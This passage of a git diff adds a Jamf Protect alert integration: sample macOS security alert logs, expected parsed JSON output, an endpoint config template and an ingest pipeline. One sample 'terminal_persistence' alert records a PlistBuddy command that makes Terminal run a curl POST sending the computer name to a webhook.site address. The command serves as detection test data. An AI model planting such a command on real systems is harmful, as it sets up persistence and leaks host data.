23C71)","protectVersion":"5.1.3.4","provisioningUDID":"0000FE00-6AD2C3C48DAB92D4","serial":"ZTG60FLTP3"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"UserElevation","composedMessage":"User mikevandelinder elevated to admin for stated reason: No reason supplied","name":"JCDaemon TPE Reasoning","process":"JCDaemon","processIdentifier":2618,"processImagePath":"\/Library\/Application Support\/JamfConnect\/JCDaemon.app\/Contents\/MacOS\/JCDaemon","sender":"JCDaemon","senderImagePath":"\/Library\/Application Support\/JamfConnect\/JCDaemon.app\/Contents\/MacOS\/JCDaemon","subsystem":"com.jamf.connect.daemon","tags":[],"timestamp":1706567549.631402,"uuid":"E6FA512E-D2F9-47F2-9B85-7A3EF09493E6"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"JCDaemon TPE Reasoning","name":"JCDaemon TPE Reasoning","severity":0,"tags":[],"uuid":"7476F070-9DD4-41DA-A782-E935E19E8D6F"}],"severity":0,"tags":[],"uuid":"36E81FA3-A9DA-4050-ABF5-B9738C23A587"}}} +{"caid":"02315cab15112294890e215397052cd73743b887c8264bc468b84df905e67e91","certid":"1f52a5585b7e0905a3f147cf4bdc014422a99247d01e3e51a996d165aecfb9f5","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"MBP14-MWARD-SONOMA","ips":["175.16.199.11"],"os":"Version 14.3 (Build 23D56)","protectVersion":"5.1.2.2","provisioningUDID":"00006000-000259581A04401E","serial":"CKV6H2WMFM"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"Standard","composedMessage":"-[LWAuthServiceManager event:eventHints:reply:] | ======== SCREENLOCK ==== APEventTouchIDMatch =========","name":"LoginWindow TouchID Success","process":"loginwindow","processIdentifier":7695,"processImagePath":"\/System\/Library\/CoreServices\/loginwindow.app\/Contents\/MacOS\/loginwindow","sender":"loginwindow","senderImagePath":"\/System\/Library\/CoreServices\/loginwindow.app\/Contents\/MacOS\/loginwindow","subsystem":"com.apple.loginwindow.logging","tags":["login","touchid"],"timestamp":1706536039.430031,"uuid":"F5E4AAF2-D0C0-47D4-BD89-931DC8A9BDB9"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"LoginWindow TouchID Success","name":"LoginWindow TouchID Success","severity":0,"tags":["login","touchid"],"uuid":"E2BD5299-B217-411F-B3C4-1FC2C2DCC106"}],"severity":0,"tags":["login","touchid"],"uuid":"AF42B6FF-66D0-4808-8B4D-D7594D62A79B"}}} diff --git a/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log-expected.json b/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log-expected.json new file mode 100644 index 00000000000..a32a8a17368 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/_dev/test/pipeline/test-jamf-protect-alerts-sample-logs.log-expected.json @@ -0,0 +1,869 @@ +{ + "expected": [ + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "CustomURLHandlerCreation", + "category": [ + "host", + "file" + ], + "id": "6bdb0697-6d07-47bc-a37d-6c3348a5d953", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Application that uses custom url handler created", + "severity": 0, + "start": "2023-11-21T11:32:44.184Z", + "type": [ + "change" + ] + }, + "file": { + "code_signature": { + "status": "code object is not signed at all" + }, + "gid": "0", + "inode": "19478271", + "mode": "16804", + "path": "/Applications/.Microsoft Teams (work or school).app.installBackup", + "size": 96, + "uid": "0" + }, + "group": { + "id": "0", + "name": "wheel" + }, + "host": { + "hostname": "LMAC-ZW0GTLVDL", + "id": "32EC79C5-26DC-535A-85F7-986F063297E2", + "ip": [ + "175.16.199.1" + ], + "os": { + "family": "macos", + "full": "Version 14.2 (Build 23C5030f)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper", + "XPC_SERVICE_NAME=com.microsoft.autoupdate.helper", + "PATH=/usr/bin:/bin:/usr/sbin:/sbin", + "XPC_FLAGS=1", + "pfz=0x7ffffff12000", + "stack_guard=0x94bec1a9eb9800ea", + "malloc_entropy=0x7777a3bc060946c0,0x6f95455435250cbc", + "ptr_munge=0x749c1515ccadfca", + "main_stack=0x7ff7bf6da000,0x800000,0x7ff7bb6da000,0x4000000", + "executable_file=0x1a01000009,0x12f5060", + "dyld_file=0x1a01000009,0xfffffff000982f7", + "executable_cdhash=262df85f4455ca182cb45671afb26c9ad9dff13b", + "executable_boothash=1fc9ca7065a4d7a9c299cc51414c052e5d7025d7", + "th_port=0x103" + ], + "code_signature": { + "signing_id": "com.microsoft.autoupdate.helper", + "status": "No error.", + "team_id": "UBF8T346G9" + }, + "entity_id": "b8cd6fa5-e8c3-4f05-88a0-68469d04806c", + "executable": "/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper", + "group_leader": { + "executable": "/Library/PrivilegedHelperTools/com.microsoft.autoupdate.helper", + "name": "com.microsoft.autoupdate.helper", + "pid": 15910, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-21T11:32:44Z", + "user": { + "id": "0" + } + }, + "hash": { + "sha1": "5ddcd49004e66cead79ca82991f1b4d4a8ba52d9", + "sha256": "8fd91d9d1ca53ef93921c8072e12ec082c9eba62bf93f0f900e71b6aa4fa0ed8" + }, + "name": "com.microsoft.autoupdate.helper", + "parent": { + "pid": 15910 + }, + "pid": 15910, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-21T11:32:44Z", + "user": { + "id": "0" + } + }, + "related": { + "hash": [ + "5ddcd49004e66cead79ca82991f1b4d4a8ba52d9", + "8fd91d9d1ca53ef93921c8072e12ec082c9eba62bf93f0f900e71b6aa4fa0ed8" + ], + "ip": [ + "175.16.199.1" + ], + "user": [ + "root" + ] + }, + "tags": [ + "Visibility" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "User Elevated Action", + "category": [ + "host", + "process" + ], + "id": "7232d4a4-2289-49ba-a218-215ef3d62ec4", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "Application used deprecated elevation API", + "severity": 0, + "start": "2023-11-01T12:20:38.851Z", + "type": [ + "start" + ] + }, + "group": { + "id": "0", + "name": "wheel" + }, + "host": { + "hostname": "VMAC-2C23RW4DY", + "id": "0000FE00-8406CE28ECFC4DAB", + "ip": [ + "175.16.199.2" + ], + "os": { + "family": "macos", + "full": "Version 14.0 (Build 23A344)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/usr/libexec/security_authtrampoline", + "/Library/Application Support/JAMF/Remote Assist/Wipe", + "auth 16" + ], + "code_signature": { + "signing_id": "com.apple.security_authtrampoline", + "status": "No error." + }, + "entity_id": "c821d617-2ce5-4475-aae6-c428a1ad9e8c", + "executable": "/usr/libexec/security_authtrampoline", + "group_leader": { + "executable": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", + "name": "Terminal", + "pid": 765, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2023-11-01T12:11:11Z", + "user": { + "id": "501" + } + }, + "hash": { + "sha1": "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "sha256": "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + }, + "name": "security_authtrampoline", + "parent": { + "code_signature": { + "signing_id": "com.jamf.remoteassist.launcher", + "status": "No error.", + "team_id": "483DWKW443" + }, + "entity_id": "a382cfda-8964-4388-8c19-49d4eaef2ae7", + "executable": "/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher", + "name": "jamfRemoteAssistLauncher", + "pid": 3099, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:36Z", + "user": { + "id": "0" + } + }, + "pid": 3136, + "real_group": { + "id": "0" + }, + "real_user": { + "id": "0" + }, + "start": "2023-11-01T12:20:38Z", + "tty": "/dev/ttys016", + "user": { + "id": "0" + } + }, + "related": { + "hash": [ + "82e899cb1c8a42b74653b05ca526d5feae92b9f6", + "7528368ce03bd25fb22520923f366e364ea40ae90b22dac79fba90f2152c3d32" + ], + "ip": [ + "175.16.199.2" + ], + "user": [ + "root", + "local-admin" + ] + }, + "tags": [ + "DefenseEvasion", + "T1548.004", + "PrivilegeEscalation", + "MITREattack", + "AbuseElevationControlMechanism" + ], + "threat": { + "framework": "MITRE ATT\u0026CK", + "software": { + "platforms": "macOS" + } + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "terminal_persistence", + "category": [ + "host", + "file" + ], + "id": "4ecfd2ae-0f05-4b5d-8079-85f43d72ccf4", + "kind": "alert", + "provider": "Jamf Protect", + "severity": 0, + "start": "2024-01-31T13:30:53.090Z", + "type": [ + "change" + ] + }, + "file": { + "code_signature": { + "status": "code object is not signed at all" + }, + "gid": "20", + "hash": { + "sha1": "4410ab912212c5e196f063b5bb62b837c334e78d", + "sha256": "9ea2625bca753b36d358be22abb4ca672a538b80ec2b9de527f6beb2c961e245" + }, + "inode": "283232", + "mode": "33152", + "path": "/Users/john/Library/Preferences/com.apple.Terminal.plist", + "size": 29235, + "uid": "501" + }, + "group": { + "id": "20", + "name": "staff" + }, + "host": { + "hostname": "VMAC-41L97RNJT", + "id": "0000FE00-2134CAD3E728E967", + "ip": [ + "175.16.199.3" + ], + "os": { + "family": "macos", + "full": "Version 14.3 (Build 23D56)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/usr/libexec/PlistBuddy", + "-c", + "Set :\"Window Settings\":Basic:CommandString 'curl -X POST -H \"Content-Type: application/json\" -d \"{\\\"computer_name\\\": \\\"VMAC-41L97RNJT\\\"}\" https://webhook.site/33654518-7909-455f-ab94-2b981036b12e'", + "/Users/john/Library/Preferences/com.apple.Terminal.plist" + ], + "code_signature": { + "signing_id": "com.apple.PlistBuddy", + "status": "No error." + }, + "entity_id": "76d0dd90-7aa2-418a-8f87-f3b21a83bb6c", + "executable": "/usr/libexec/PlistBuddy", + "group_leader": { + "executable": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", + "name": "Terminal", + "pid": 3555, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-31T13:02:19Z", + "user": { + "id": "501" + } + }, + "hash": { + "sha1": "4f6dcbbb78f2015ce796756638bfa8ae3831d5ca", + "sha256": "5f9a5f0fde9f19d3493100d85a4faa9e2f7f08112ec4bd82a7dce4ea69de0f4e" + }, + "name": "PlistBuddy", + "parent": { + "code_signature": { + "signing_id": "com.apple.zsh", + "status": "No error." + }, + "entity_id": "8afa3e04-ab59-48f1-87fa-bd42b2b1e71c", + "executable": "/bin/zsh", + "name": "zsh", + "pid": 4204, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-31T13:11:42Z", + "user": { + "id": "501" + } + }, + "pid": 4645, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-31T13:30:53Z", + "tty": "/dev/ttys000", + "user": { + "id": "501" + } + }, + "related": { + "hash": [ + "4410ab912212c5e196f063b5bb62b837c334e78d", + "9ea2625bca753b36d358be22abb4ca672a538b80ec2b9de527f6beb2c961e245", + "4f6dcbbb78f2015ce796756638bfa8ae3831d5ca", + "5f9a5f0fde9f19d3493100d85a4faa9e2f7f08112ec4bd82a7dce4ea69de0f4e" + ], + "ip": [ + "175.16.199.3" + ], + "user": [ + "john", + "root" + ] + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "DockTileAdded", + "category": [ + "host", + "file" + ], + "id": "0090c24f-dcab-44f0-9395-1c2f5e688d4b", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "New Dock Tile registered", + "severity": 1, + "start": "2024-01-25T00:13:21.459Z", + "type": [ + "change" + ] + }, + "file": { + "code_signature": { + "signing_id": "com.setapp.DesktopClient", + "status": "No error.", + "team_id": "MEHY5QF425" + }, + "gid": "20", + "inode": "22894871", + "mode": "16877", + "path": "/Applications/Setapp.app", + "size": 96, + "uid": "501" + }, + "group": { + "id": "20" + }, + "host": { + "hostname": "LMAC-ZW0GTLVDL", + "id": "32EC79C5-26DC-535A-85F7-986F063297E2", + "ip": [ + "175.16.199.4" + ], + "os": { + "family": "macos", + "full": "Version 14.2 (Build 23C5030f)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "args": [ + "/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate", + "com.setapp.DesktopClient", + "/Users/thijs", + "thijs" + ], + "code_signature": { + "signing_id": "Autoupdate-555549446afbe33f0c8f39a58f46e1bd35e14c86", + "status": "No error.", + "team_id": "MEHY5QF425" + }, + "entity_id": "b1b340e9-4fd9-4cdf-8602-cf7796828926", + "executable": "/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate", + "group_leader": { + "executable": "/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate", + "name": "Autoupdate", + "pid": 64885, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-25T00:09:02Z", + "user": { + "id": "501" + } + }, + "hash": { + "sha1": "e9a46b7ad0356aa655baa324d67b6abc762820df", + "sha256": "f6d8bd4d2864ec71c6628fe803458da6d7737575cde62e5044645de692e9e748" + }, + "name": "Autoupdate", + "parent": { + "pid": 64885 + }, + "pid": 64885, + "real_group": { + "id": "20" + }, + "real_user": { + "id": "501" + }, + "start": "2024-01-25T00:09:02Z", + "user": { + "id": "501" + } + }, + "related": { + "hash": [ + "e9a46b7ad0356aa655baa324d67b6abc762820df", + "f6d8bd4d2864ec71c6628fe803458da6d7737575cde62e5044645de692e9e748" + ], + "ip": [ + "175.16.199.4" + ] + }, + "tags": [ + "Persistence", + "BootOrLogonAutostartExecution", + "MITREattack", + "T1547" + ], + "threat": { + "framework": "MITRE ATT\u0026CK", + "software": { + "platforms": "macOS" + } + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "USBInserted", + "category": [ + "host" + ], + "id": "db492c7c-a301-43ab-afa3-fc02f661918f", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "USB device inserted", + "severity": 0, + "start": "2024-01-17T19:19:40.146Z" + }, + "host": { + "hostname": "LMAC-ZW0GTLVDL", + "id": "32EC79C5-26DC-535A-85F7-986F063297E2", + "ip": [ + "175.16.199.5" + ], + "os": { + "family": "macos", + "full": "Version 14.2 (Build 23C5030f)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "related": { + "ip": [ + "175.16.199.5" + ] + }, + "tags": [ + "Visibility" + ], + "volume": { + "bus_type": "XHC3", + "file_system_type": "GUID_partition_scheme", + "nt_name": "disk3", + "product_id": "0x5595", + "product_name": "Ultra USB 3.0", + "removable": true, + "serial_number": "4C531001410227100573", + "size": 15376000000, + "vendor_id": "0x0781", + "vendor_name": "SanDisk", + "writable": true + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "new_downloads", + "category": [ + "host", + "file" + ], + "id": "7288b17d-d2d1-4de7-b76a-df3529cfe0a8", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "severity": 0, + "start": "2023-09-28T08:13:18.877Z" + }, + "file": { + "code_signature": { + "signing_id": "JamfConnect-2", + "status": "No error.", + "team_id": "483DWKW443" + }, + "gid": "20", + "hash": { + "sha1": "0a5f0aa7cbe904e687341e2eee453348e3a3760d", + "sha256": "f7688a83f2c508c16128bd512e1d57b122824001a0c560b12b63c26d3cb7f4a0" + }, + "inode": "3900740", + "mode": "33188", + "path": "/Users/local-admin/Downloads/JamfConnect-2.27.0.dmg", + "size": 35249769, + "uid": "501" + }, + "group": { + "id": "20", + "name": "staff" + }, + "host": { + "hostname": "VMAC-2C23RW4DY", + "id": "0000FE00-8406CE28ECFC4DAB", + "ip": [ + "175.16.199.6" + ], + "os": { + "family": "macos", + "full": "Version 14.0 (Build 23A344)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "related": { + "hash": [ + "0a5f0aa7cbe904e687341e2eee453348e3a3760d", + "f7688a83f2c508c16128bd512e1d57b122824001a0c560b12b63c26d3cb7f4a0" + ], + "ip": [ + "175.16.199.6" + ], + "user": [ + "local-admin" + ] + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "XProtect Remediator Scan Activity", + "category": [ + "host" + ], + "id": "7E46E4CD-0999-44C7-8EEE-6AC21876126E", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "XProtect Remediator Scan Activity", + "severity": 0, + "start": "2023-11-08T08:42:24.315Z" + }, + "host": { + "hostname": "PCJVW6XJGM", + "id": "00006000-000678310153401E", + "ip": [ + "175.16.199.7" + ], + "os": { + "family": "macos", + "full": "Version 13.6.1 (Build 22G313)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "XProtectRemediatorGreenAcre", + "pid": 6925, + "start": "2023-11-08T08:42:24.315Z" + }, + "related": { + "ip": [ + "175.16.199.7" + ] + }, + "tags": [ + "XProtect Remediator" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "XProtect Remediator Scan Activity", + "category": [ + "host" + ], + "id": "7E46E4CD-0999-44C7-8EEE-6AC21876126E", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "XProtect Remediator Scan Activity", + "severity": 0, + "start": "2023-11-08T08:42:24.315Z" + }, + "host": { + "hostname": "PCJVW6XJGM", + "id": "00006000-000678310153401E", + "ip": [ + "175.16.199.8" + ], + "os": { + "family": "macos", + "full": "Version 13.6.1 (Build 22G313)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "XProtectRemediatorGreenAcre", + "pid": 6925, + "start": "2023-11-08T08:42:24.315Z" + }, + "related": { + "ip": [ + "175.16.199.8" + ] + }, + "tags": [ + "XProtect Remediator" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "XProtect Remediator Scan Activity", + "category": [ + "host" + ], + "id": "CE2F93FE-F786-4BBC-B893-3F98D82488A7", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "XProtect Remediator Scan Activity", + "severity": 0, + "start": "2024-01-31T23:39:35.695Z" + }, + "host": { + "hostname": "mike.test’s MacBook Pro", + "id": "00008103-001C70A61AA2001E", + "ip": [ + "175.16.199.9", + "175.16.199.18" + ], + "os": { + "family": "macos", + "full": "Version 14.3 (Build 23D56)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "XProtectRemediatorWaterNet", + "pid": 4052, + "start": "2024-01-31T23:39:35.695Z" + }, + "related": { + "ip": [ + "175.16.199.9", + "175.16.199.18" + ] + }, + "tags": [ + "XProtect Remediator" + ] + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "JCDaemon TPE Reasoning", + "category": [ + "host" + ], + "id": "36E81FA3-A9DA-4050-ABF5-B9738C23A587", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "JCDaemon TPE Reasoning", + "severity": 0, + "start": "2024-01-29T22:32:29.631Z" + }, + "host": { + "hostname": "Mike’s Virtual Machine", + "id": "0000FE00-6AD2C3C48DAB92D4", + "ip": [ + "175.16.199.10" + ], + "os": { + "family": "macos", + "full": "Version 14.2.1 (Build 23C71)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "JCDaemon", + "pid": 2618, + "start": "2024-01-29T22:32:29.631Z" + }, + "related": { + "ip": [ + "175.16.199.10" + ] + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "LoginWindow TouchID Success", + "category": [ + "host" + ], + "id": "AF42B6FF-66D0-4808-8B4D-D7594D62A79B", + "kind": "alert", + "outcome": "success", + "provider": "Jamf Protect", + "reason": "LoginWindow TouchID Success", + "severity": 0, + "start": "2024-01-29T13:47:19.430Z" + }, + "host": { + "hostname": "MBP14-MWARD-SONOMA", + "id": "00006000-000259581A04401E", + "ip": [ + "175.16.199.11" + ], + "os": { + "family": "macos", + "full": "Version 14.3 (Build 23D56)" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "process": { + "name": "loginwindow", + "pid": 7695, + "start": "2024-01-29T13:47:19.430Z" + }, + "related": { + "ip": [ + "175.16.199.11" + ] + }, + "tags": [ + "login", + "touchid" + ] + } + ] +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/alerts/agent/stream/http_endpoint.yml.hbs b/packages/jamf_protect/data_stream/alerts/agent/stream/http_endpoint.yml.hbs new file mode 100644 index 00000000000..b1f76c36101 --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/agent/stream/http_endpoint.yml.hbs @@ -0,0 +1,35 @@ +listen_address: {{listen_address}} +listen_port: {{listen_port}} +url: {{url}} +{{#if secret_header}} +secret.header: {{secret_header}} +{{/if}} +{{#if secret_value}} +secret.value: {{secret_value}} +{{/if}} +{{#if preserve_original_event}} +preserve_original_event: true +{{/if}} +{{#if preserve_duplicate_custom_fields}} +preserve_duplicate_custom_fields: true +{{/if}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if ssl}} +ssl: {{ssl}} +{{/if}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..4686df7d16e --- /dev/null +++ b/packages/jamf_protect/data_stream/alerts/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,494 @@ +--- +description: Pipeline for parsing Jamf Protect Alert and Unified Logging logs +processors: + - set: + field: ecs.version + value: '8.11.0' + - json: + field: message + target_field: jamf_protect.alerts + if: ctx.message != null + - rename: + field: json + target_field: jamf_protect.alerts + if: ctx.json != null + +########################## +## ECS Observer Mapping ## +########################## + - set: + field: observer.product + value: Jamf Protect + - set: + field: observer.vendor + value: Jamf + +####################### +## ECS Event Mapping ## +####################### + - set: + field: event.kind + value: alert + - set: + field: event.provider + value: Jamf Protect + - date: + field: jamf_protect.alerts.input.match.event.timestamp + target_field: event.start + formats: + - UNIX + if: ctx.jamf_protect?.alerts?.input?.match?.event?.timestamp != null + - append: + field: event.category + value: host + - append: + field: event.category + value: malware + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPThreatMatchExecEvent' + - append: + field: event.category + value: process + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPProcessEvent' + - append: + field: event.category + value: file + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' + - append: + field: event.category + value: file + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPDownloadEvent' + - rename: + field: ctx.jamf_protect.alerts.input.match.facts[0].name + target_field: rule.name + if: ctx.jamf_protect?.alerts?.input?.match?.facts[0].name != null + ignore_missing: true + - rename: + field: ctx.jamf_protect?.alerts.input.match.facts[0].name + target_field: rule.description + if: ctx.jamf_protect?.alerts?.input?.match?.facts[0].human != null + ignore_missing: true + - script: + description: Populates event.action with the name of the event + lang: painless + source: > + if (ctx.jamf_protect?.alerts?.input?.match?.facts != null && ctx.jamf_protect.alerts.input.match.facts.size() > 0) { + if (ctx.jamf_protect.alerts.input.match.facts[0].containsKey('name')) { + ctx.event.action = ctx.jamf_protect.alerts.input.match.facts[0].name; + } + } + ignore_failure: true + - script: + description: Populates event.reason with the name of the event + lang: painless + source: > + if (ctx.jamf_protect?.alerts?.input?.match?.facts != null && ctx.jamf_protect.alerts.input.match.facts.size() > 0) { + if (ctx.jamf_protect.alerts.input.match.facts[0].containsKey('human')) { + ctx.event.reason = ctx.jamf_protect.alerts.input.match.facts[0].human; + } + } + ignore_failure: true + - script: + description: Populates event.tags with tags from the event + lang: painless + source: > + if (ctx.jamf_protect?.alerts?.input?.match?.facts != null && ctx.jamf_protect.alerts.input.match.facts.size() > 0) { + if (ctx.jamf_protect.alerts.input.match.facts[0].containsKey('tags')) { + ctx.tags = ctx.jamf_protect.alerts.input.match.facts[0].tags; + } + } + ignore_failure: true + - rename: + field: jamf_protect.alerts.input.match.uuid + target_field: event.id + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.match?.uuid != null + - rename: + field: jamf_protect.alerts.input.match.severity + target_field: event.severity + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.match?.severity != null + + - set: + field: event.outcome + value: failure + if: ctx.jamf_protect?.alerts?.input?.match?.actions[0]?.name == "Prevented" + - set: + field: event.outcome + value: success + if: ctx.jamf_protect?.alerts?.input?.match?.actions[0]?.name == "Report" + - set: + field: event.outcome + value: unknown + if: ctx.jamf_protect?.alerts?.input?.match?.actions[0]?.name == null + +####################### +## ECS Host Mapping ## +####################### + - rename: + field: jamf_protect.alerts.input.host.hostname + target_field: host.hostname + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.host?.hostname != null + - rename: + field: jamf_protect.alerts.input.host.provisioningUDID + target_field: host.id + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.host?.provisioningUDID != null + - rename: + field: jamf_protect.alerts.input.host.ips + target_field: host.ip + ignore_missing: true + if: ctx.jamf_protect?.alerts?.input?.host?.ips != null && ctx.jamf_protect?.alerts?.input?.host?.ips != "" + - rename: + field: jamf_protect.alerts.input.host.os + target_field: host.os.full + if: ctx.jamf_protect?.alerts?.input?.host?.os != null + ignore_missing: true + - set: + field: host.os.family + value: macos + +######################## +## ECS Source Mapping ## +######################## + - script: + description: Script processor to capture user names from related.users array + lang: painless + source: | + if (ctx.jamf_protect?.alerts?.input?.related?.users != null && ctx.jamf_protect.alerts.input.related.users.size() > 0) { + ArrayList userNames = new ArrayList(); + + for (def user : ctx.jamf_protect.alerts.input.related.users) { + if (user.containsKey('name') && user['name'] != null) { + userNames.add(user['name']); + } + } + if (userNames.size() > 0) { + ctx.related = ctx.related ?: new HashMap(); + ctx.related.user = userNames; + } + } + +######################## +# ECS File Mapping ## +######################## + - append: + field: event.type + value: creation + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 0 + - append: + field: event.type + value: deletion + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 1 + - append: + field: event.type + value: change + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 3 + - append: + field: event.type + value: change + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 4 + - append: + field: event.type + value: creation + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPFSEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 7 + + - script: + description: One scripting processor to capture all the related file information for the related file. + lang: painless + if: ctx.jamf_protect?.alerts?.input?.related?.files != null && ctx.jamf_protect?.alerts?.input?.related?.files.size() > 0 + source: > + if (ctx.jamf_protect.alerts.input.related.files.size() > 0) { + def file = ctx.jamf_protect.alerts.input.related.files[0]; + + ctx.file = ctx.file ?: new HashMap(); + + ctx.file.path = file.path; + ctx.file.size = file.size; + ctx.file.inode = String.valueOf(file.inode); + ctx.file.gid = String.valueOf(file.gid); + ctx.file.mode = String.valueOf(file.mode); + ctx.file.uid = String.valueOf(file.uid); + + ctx.file.hash = ctx.file.hash ?: new HashMap(); + ctx.file.hash.sha1 = file.sha1hex; + ctx.file.hash.sha256 = file.sha256hex; + + ctx.file.code_signature = ctx.file.code_signature ?: new HashMap(); + ctx.file.code_signature.signing_id = file.signingInfo?.appid; // Use safe navigation for nested objects + ctx.file.code_signature.status = file.signingInfo?.statusMessage; + ctx.file.code_signature.team_id = file.signingInfo?.teamid; + } + +###################### +## ECS Process Mapping ## +###################### + - append: + field: event.type + value: + - start + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPProcessEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 1 + - append: + field: event.type + value: end + if: ctx.jamf_protect?.alerts?.input?.eventType == 'GPProcessEvent' && ctx.jamf_protect?.alerts?.input?.match?.event?.type == 2 + - script: + description: One scripting processor to capture all the related process information for the current process. + lang: painless + if: ctx.jamf_protect?.alerts?.input?.related?.processes != null && ctx.jamf_protect?.alerts?.input?.related?.processes.size() > 0 + source: > + if (ctx.jamf_protect?.alerts?.input?.related?.processes != null && ctx.jamf_protect.alerts.input.related.processes.size() > 0) { + def process = ctx.jamf_protect.alerts.input.related.processes[0]; + def binary = ctx.jamf_protect.alerts.input.related.binaries[0]; + + ctx.process = ctx.process ?: new HashMap(); + ctx.process.name = process.name; + ctx.process.executable = process.path; + ctx.process.pid = process.pid; + if (process.containsKey('startTimestamp')) { + ctx.process.start = Instant.ofEpochSecond(process.startTimestamp).toString(); + } + if (process?.exitCode != null) 